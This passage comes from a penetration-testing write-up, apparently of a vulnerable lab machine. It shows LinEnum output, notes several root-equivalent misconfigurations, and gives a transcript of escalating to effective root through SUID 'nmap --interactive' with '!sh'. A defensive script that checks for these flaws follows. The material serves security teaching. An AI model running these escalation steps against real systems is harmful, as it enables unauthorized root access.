-rwxr-xr-x 1 root root 3597 Apr 19 2008 bootclean
-rwxr-xr-x 1 root root 2121 Apr 19 2008 bootlogd
-rwxr-xr-x 1 root root 1768 Apr 19 2008 bootmisc.sh
-rwxr-xr-x 1 root root 3454 Apr 19 2008 checkfs.sh
-rwxr-xr-x 1 root root 10602 Apr 19 2008 checkroot.sh
-rwxr-xr-x 1 root root 6355 May 30 2007 console-screen.sh
-rwxr-xr-x 1 root root 1634 Jan 28 2008 console-setup
-rwxr-xr-x 1 root root 1761 Apr 8 2008 cron
-rwxr-xr-x 1 root root 429 May 14 2012 distcc
-rwxr-xr-x 1 root root 1223 Jun 22 2007 dns-clean
-rwxr-xr-x 1 root root 7195 Apr 4 2008 glibc.sh
-rwxr-xr-x 1 root root 1228 Apr 19 2008 halt
-rwxr-xr-x 1 root root 909 Apr 19 2008 hostname.sh
-rwxr-xr-x 1 root root 4521 Apr 14 2008 hwclock.sh
-rwxr-xr-x 1 root root 4528 Apr 14 2008 hwclockfirst.sh
-rwxr-xr-x 1 root root 1376 Jan 28 2008 keyboard-setup
-rwxr-xr-x 1 root root 944 Apr 19 2008 killprocs
-rwxr-xr-x 1 root root 1729 Nov 23 2007 klogd
-rwxr-xr-x 1 root root 748 Jan 23 2006 loopback
-rwxr-xr-x 1 root root 1399 Feb 25 2008 module-init-tools
-rwxr-xr-x 1 root root 596 Apr 19 2008 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2430 Apr 19 2008 mountall.sh
-rwxr-xr-x 1 root root 1465 Apr 19 2008 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1544 Apr 19 2008 mountkernfs.sh
-rwxr-xr-x 1 root root 594 Apr 19 2008 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 1244 Apr 19 2008 mountoverflowtmp
-rwxr-xr-x 1 root root 3123 Apr 19 2008 mtab.sh
-rwxr-xr-x 1 root root 5755 Mar 27 2008 mysql
-rwxr-xr-x 1 root root 2515 Mar 27 2008 mysql-ndb
-rwxr-xr-x 1 root root 1905 Mar 27 2008 mysql-ndb-mgm
-rwxr-xr-x 1 root root 1772 Dec 3 2007 networking
-rwxr-xr-x 1 root root 5942 Dec 2 2008 nfs-common
-rwxr-xr-x 1 root root 4411 Dec 2 2008 nfs-kernel-server
-rwxr-xr-x 1 root root 2324 Apr 27 2007 openbsd-inetd
-rwxr-xr-x 1 root root 2377 Oct 23 2007 pcmciautils
-rwxr-xr-x 1 root root 1872 Dec 3 2007 portmap
-rwxr-xr-x 1 root root 4202 Apr 18 2008 postfix
-rwxr-xr-x 1 root root 1170 Mar 21 2008 postgresql-8.3
-rwxr-xr-x 1 root root 375 Oct 4 2007 pppd-dns
-rwxr-xr-x 1 root root 1261 Mar 13 2008 procps
-rwxr-xr-x 1 root root 4848 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 7891 Apr 19 2008 rc
-rwxr-xr-x 1 root root 522 Apr 19 2008 rc.local
-rwxr-xr-x 1 root root 117 Apr 19 2008 rcS
-rwxr-xr-x 1 root root 692 Apr 19 2008 reboot
-rwxr-xr-x 1 root root 1000 Apr 19 2008 rmnologin
-rwxr-xr-x 1 root root 4945 Apr 10 2008 rsync
-rwxr-xr-x 1 root root 1763 May 25 2004 samba
-rwxr-xr-x 1 root root 955 Oct 23 2007 screen-cleanup
-rwxr-xr-x 1 root root 1199 Apr 19 2008 sendsigs
-rwxr-xr-x 1 root root 585 Apr 19 2008 single
-rwxr-xr-x 1 root root 4215 Apr 19 2008 skeleton
-rwxr-xr-x 1 root root 2747 Sep 24 2009 snmpd
-rwxr-xr-x 1 root root 3839 Apr 6 2008 ssh
-rwxr-xr-x 1 root root 510 Apr 19 2008 stop-bootlogd
-rwxr-xr-x 1 root root 647 Apr 19 2008 stop-bootlogd-single
-rwxr-xr-x 1 root root 3343 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 6860 Dec 7 2008 tomcat5.5
-rwxr-xr-x 1 root root 2488 Apr 11 2008 udev
-rwxr-xr-x 1 root root 706 Apr 11 2008 udev-finish
-rwxr-xr-x 1 root root 6358 Apr 7 2008 ufw
-rwxr-xr-x 1 root root 4030 Apr 19 2008 umountfs
-rwxr-xr-x 1 root root 1833 Apr 19 2008 umountnfs.sh
-rwxr-xr-x 1 root root 1863 Apr 19 2008 umountroot
-rwxr-xr-x 1 root root 1815 Apr 19 2008 urandom
-rwxr-xr-x 1 root root 2445 Apr 19 2008 waitnfs.sh
-rwxr-xr-x 1 root root 1626 Mar 12 2008 wpa-ifupdown
-rwxr-xr-x 1 root root 1843 May 13 2008 x11-common
-rwxr-xr-x 1 root root 1896 Dec 3 2007 xinetd
-rwxr-xr-x 1 root root 568 Mar 30 2008 xserver-xorg-input-wacom

### SOFTWARE #############################################
Sudo version:
Sudo version 1.6.9p10

MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

***We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 3 hours 25 min 31 sec

Threads: 1 Questions: 439 Slow queries: 0 Opens: 419 Flush tables: 1 Open tables: 64 Queries per second avg: 0.036

Postgres version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built: Mar 9 2010 20:45:36

Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

Anything in the Apache home dirs?:
/var/www/:
total 8.0K
drwxr-xr-x 2 www-data www-data 4.0K Mar 14 2017 .
drwxr-xr-x 15 root root 4.0K May 20 2012 ..

### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc

Installed compilers:
ii distcc 2.18.3-4.1ubuntu1 Simple distributed compiler client and serve
ii g++ 4:4.2.3-1ubuntu6 The GNU C++ compiler
ii g++-4.2 4.2.4-1ubuntu4 The GNU C++ compiler
ii gcc 4:4.2.3-1ubuntu6 The GNU C compiler
ii gcc-4.2 4.2.4-1ubuntu4 The GNU C compiler
ii gcj-4.2 4.2.4-1ubuntu3 The GNU compiler for Java(TM)
ii libecj-java 3.3.0+0728-5 Eclipse Java compiler (library)
ii libecj-java-gcj 3.3.0+0728-5 Eclipse Java compiler (native library)

Can we read/write sensitive files:
-rw-r--r-- 1 root root 1549 Mar 14 2017 /etc/passwd
-rw-r--r-- 1 root root 784 Mar 14 2017 /etc/group
-rw-r--r-- 1 root root 497 May 13 2012 /etc/profile
-rw-r----- 1 root shadow 1171 Mar 14 2017 /etc/shadow

SUID files:
-rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown

***Possibly interesting SUID files:
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap

GUID files:
-rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop

Hosts.equiv file details and file contents:
-rw-r--r-- 1 root root 121 May 20 2012 /etc/hosts.equiv
# /etc/hosts.equiv: list of hosts and users that are granted "trusted" r
# command access to your system .
+ +

NFS config details:
-rw-r--r-- 1 root root 367 May 13 2012 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync) hostname2(ro,sync)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt)
# /srv/nfs4/homes gss/krb5i(rw,sync)
#

/ *(rw,sync,no_root_squash,no_subtree_check)

Can't search *.conf files as no keyword was entered

Can't search *.log files as no keyword was entered

Can't search *.ini files as no keyword was entered

All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr 9 2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov 6 2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13 2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr 4 2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20 2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16 2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20 2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16 2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 19 2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 43 Mar 14 2017 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16 2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28 2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec 2 2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16 2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May 4 2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20 2012 /etc/xinetd.conf

Current user's history files:
-rw------- 1 root daemon 679 Dec 5 16:59 /usr/sbin/.bash_history

***Root's history files are accessible!
lrwxrwxrwx 1 root root 9 May 14 2012 /root/.bash_history -> /dev/null

Any interesting mail in /var/mail:
total 12
drwxrwsr-x 2 root mail 4096 Mar 14 2017 .
drwxr-xr-x 15 root root 4096 May 20 2012 ..
-rw------- 1 root mail 1438 Mar 14 2017 root

### SCAN COMPLETE ####################################

This is a ton of new information, and the only good way to work through it is to start at the top and read down. Part way through, LinEnum flags an nmap binary that is SUID root (/usr/bin/nmap, owned by root with the setuid bit set). From previous engagements we know that old nmap releases (2.02 through 5.21) ship an interactive mode, --interactive, from which shell commands can be run with a leading "!"; because the binary is SUID root, anything it spawns inherits an effective UID of 0. The same output also shows several other root-equivalent paths worth noting before moving on: the root filesystem is exported to every NFS client without root squashing ("/ *(rw,sync,no_root_squash,no_subtree_check)" in /etc/exports), /etc/hosts.equiv contains "+ +" (every host and every user trusted for the r-commands), /etc/inetd.conf has an ingreslock entry that serves a root "bash -i", and distccd is running with "--allow 0.0.0.0/0", which is the service we came in through. Let's try the SUID nmap route to escalate our privileges.


sh-3.2$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh-3.2$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

Ha, while our real user and group are still daemon, we now have an effective user ID (EUID) of 0, root. Since the kernel's permission checks use the effective ID, that is enough to read /root and dump the root proof now. (The doubled "id" lines in the transcript are just local echo from the non-tty reverse shell, not a second command.)
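As an added example (not code from the original post, and not part of LinEnum), the POSIX shell script below re-checks the root-equivalent findings that surface in the enumeration output above: whether the SUID nmap's version still ships --interactive, the "/" export with no_root_squash in /etc/exports, the "+ +" line in /etc/hosts.equiv, and the ingreslock entry that serves bash -i in /etc/inetd.conf. The SAMPLE_* strings are constructed inputs shaped like that output so the script runs offline; every check reads stdin so it can be fed the real files on a target. The list of shell-capable SUID program names and the 2.02 to 5.21 version range are assumptions taken from GTFOBins-style knowledge, not something the post itself states.

```shell
#!/bin/sh
# Added triage helper, not part of the original walkthrough or of LinEnum.
# Re-checks the root paths visible in the enumeration output above. Each
# check reads its input on stdin so it can be fed the real file on a target;
# the SAMPLE_* values are constructed inputs mirroring that output.

SAMPLE_EXPORTS='# /etc/exports: the access control list for filesystems
/srv/homes hostname1(rw,sync) hostname2(ro,sync)
/ *(rw,sync,no_root_squash,no_subtree_check)'

SAMPLE_HOSTS_EQUIV='# /etc/hosts.equiv: hosts and users granted r-command access
+ +'

SAMPLE_INETD='#<off># ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd
ingreslock stream tcp nowait root /bin/bash bash -i'

SAMPLE_SUID_LS='-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at'

# nmap_has_interactive VERSION: exit 0 if VERSION falls in the range that
# shipped "nmap --interactive" (2.02 through 5.21, assumed from GTFOBins), else 1.
nmap_has_interactive() {
  major=${1%%.*}
  if [ "$major" = "$1" ]; then minor=0; else minor=${1#*.}; minor=${minor%%.*}; fi
  minor=$(printf '%s' "$minor" | tr -cd '0-9')
  [ -n "$minor" ] || minor=0
  if [ "$major" -lt 2 ] || [ "$major" -gt 5 ]; then return 1; fi
  if [ "$major" -eq 2 ] && [ "$minor" -lt 2 ]; then return 1; fi
  if [ "$major" -eq 5 ] && [ "$minor" -gt 21 ]; then return 1; fi
  return 0
}

# exports_world_root: print /etc/exports lines (stdin) that export a path to
# every client ("*") without root squashing, i.e. remote root stays root.
exports_world_root() {
  grep -v '^[[:space:]]*#' | grep -E '^[^[:space:]#]+[[:space:]]+\*\(.*no_root_squash'
}

# hosts_equiv_wildcards: print /etc/hosts.equiv lines (stdin) that trust every
# host ("+") or every host and every user ("+ +") for rsh/rlogin.
hosts_equiv_wildcards() {
  grep -v '^[[:space:]]*#' | grep -E '^[[:space:]]*\+([[:space:]]|$)'
}

# inetd_shell_services: print active /etc/inetd.conf entries (stdin) whose
# server program or its arguments (field 6 onward) are a shell.
inetd_shell_services() {
  grep -v '^[[:space:]]*#' | awk '{
    for (i = 6; i <= NF; i++)
      if ($i ~ /(^|\/)(ba)?sh$/) { print; next }
  }'
}

# suid_root_shell_binaries: from an "ls -l" style listing (stdin), print
# root-owned setuid executables whose name is on an assumed list of programs
# known to spawn a shell (in the spirit of GTFOBins; extend as needed).
suid_root_shell_binaries() {
  awk '$1 ~ /^-r.s/ && $3 == "root" {
    n = split($NF, p, "/")
    if (p[n] ~ /^(nmap|vim|vi|find|less|more|bash|sh|python|perl)$/) print $NF
  }'
}

# report: run every check against the constructed samples.
report() {
  if nmap_has_interactive 4.53; then
    echo "nmap 4.53: --interactive available, '!sh' gives a root shell from SUID nmap"
  fi
  echo "NFS exports without root squash:";   printf '%s\n' "$SAMPLE_EXPORTS" | exports_world_root
  echo "hosts.equiv wildcards:";             printf '%s\n' "$SAMPLE_HOSTS_EQUIV" | hosts_equiv_wildcards
  echo "inetd services that are shells:";    printf '%s\n' "$SAMPLE_INETD" | inetd_shell_services
  echo "SUID root shell-capable binaries:";  printf '%s\n' "$SAMPLE_SUID_LS" | suid_root_shell_binaries
}

report
```

On a real host the same functions take the live files: exports_world_root < /etc/exports, hosts_equiv_wildcards < /etc/hosts.equiv, inetd_shell_services < /etc/inetd.conf, and find / -perm -4000 -type f -exec ls -l {} + | suid_root_shell_binaries, with the version string from nmap -V passed to nmap_has_interactive. Each function prints only the offending lines, so empty output is a clean result for that check.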


Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.
